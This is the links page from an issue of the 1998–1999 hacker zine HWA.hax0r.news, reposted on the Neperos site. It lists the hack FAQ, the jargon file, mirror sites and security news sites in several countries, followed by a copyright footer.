~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="
http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="
http://www.tuxedo.org/~esr/jargon/">New jargon file</a>


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/
<a href="
http://bewoner.dma.be/cum/">Go there</a>

Brasil........: http://www.psynet.net/ka0z
<a href="
http://www.psynet.net/ka0z/">Go there</a>

http://www.elementais.cjb.net
<a href="
http://www.elementais.cjb.net/">Go there</a>

Canada .......: http://www.hackcanada.com
<a href="
http://www.hackcanada.com/">Go there</a>

Columbia......: http://www.cascabel.8m.com
<a href="
http://www.cascabel.8m.com/">Go there</a>

http://www.intrusos.cjb.net
<a href="
http://www.intrusos.cjb.net">Go there</a>

Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="
http://www.k-elektronik.org/index2.html">Go there</a>

http://members.xoom.com/neblonica/
<a href="
http://members.xoom.com/neblonica/">Go there</a>

http://hackerlink.or.id/
<a href="
http://hackerlink.or.id/">Go there</a>

Netherlands...: http://security.pine.nl/
<a href="
http://security.pine.nl/">Go there</a>

Russia........: http://www.tsu.ru/~eugene/
<a href="
http://www.tsu.ru/~eugene/">Go there</a>

Singapore.....: http://www.icepoint.com
<a href="
http://www.icepoint.com">Go there</a>

Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
<a href="
http://www.trscene.org/">Go there</a>

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT